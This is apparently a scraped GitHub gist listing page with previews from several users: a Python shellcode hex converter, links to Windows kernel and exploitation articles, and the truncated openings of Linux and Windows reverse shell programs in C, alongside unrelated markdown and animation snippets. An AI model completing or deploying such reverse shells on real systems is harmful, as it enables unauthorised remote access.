Skip to content

Instantly share code, notes, and snippets.

View loneicewolf's full-sized avatar
☢️
Turning malware into Antibodies!

Will loneicewolf

☢️
Turning malware into Antibodies!
View GitHub Profile
import binascii
import sys
file_name = sys.argv[1]
with open (file_name) as f:
hexdata = binascii.hexlify(f.read())
hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
shellcode = ''
for i in hexlist:
shellcode += "0x{},".format(i)
@dbetebenner
dbetebenner / SimpleDropdown.md
Last active January 30, 2023 09:52
Simple Dropdown with Markdown
What's this Just some stuff here
import binascii
import sys
file_name = sys.argv[1]
with open (file_name) as f:
hexdata = binascii.hexlify(f.read())
hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
shellcode = ''
for i in hexlist:
shellcode += "0x{},".format(i)

Windows Kernel Learning: https://mirokaku.github.io/Blog/categories/Windows-kernel-learning/

Journey Into the Object Manager Executive Subsystem: Handles: https://ntamonsec.blogspot.com/2020/06/journey-into-object-manager-executive-handles.html

Random Windows Kernel Articles: https://codemachine.com/articles.html

Journey Into the Object Manager Executive Subsystem: Object Header and Object Type: https://ntamonsec.blogspot.com/2020/05/journey-into-object-manager-executive.html

Windows Exploitation Tricks (All Articles)

@loneicewolf
loneicewolf / compact_linux_reverse_shell.c
Last active March 25, 2024 22:10
A compact linux reverse shell written in the C Programming Language.
/*
NOTE See Below for version 2 (and updates, erratas, fixes, links, and so on)
NOTE don't assume or think this is the latest because it's on first on top on the list; it's not.
Version 1 'naive approach' (hard coded values, etc)
gcc -g -o L1 lin_1.c
*/
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#define RP 1234
@loneicewolf
loneicewolf / compact_windows_reverse_shell.c
Last active June 3, 2024 12:24
A compact windows reverse shell written in the C Programming Language.
/*
* code inspired and modified from defcon25,MSDocs,StackOverflow
* i686-w64-mingw32-gcc -o win_rsh win_rsh.c -lws2_32
*/
#include <ws2tcpip.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32")
int main(int argc, char *argv[]){
WSADATA wsaData;
@loneicewolf
loneicewolf / README.md
Last active February 3, 2024 19:17
LKM Loadable Kernel Modules in Linux

LKM - Loadable Kernel Modules in Linux

Some code taken from other sources(others repo's, gist's), sites, courses, and so on. And some code is made and/or modified by me; :warning: note - any of this is not perfect; I make this gist to some friends which asked me for some beginner lkm dev;

@zeldal1
zeldal1 / compact_linux_reverse_shell.c
Created March 25, 2024 22:10 — forked from loneicewolf/compact_linux_reverse_shell.c
A compact linux reverse shell written in the C Programming Language.
/*
NOTE See Below for version 2 (and updates, erratas, fixes, links, and so on)
NOTE don't assume or think this is the latest because it's on first on top on the list; it's not.
Version 1 'naive approach' (hard coded values, etc)
gcc -g -o L1 lin_1.c
*/
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#define RP 1234
from manim import *
import string
import random
random.seed(513)
def gen_text(text = string.ascii_uppercase):
b = VGroup()
lr = None
for x in text: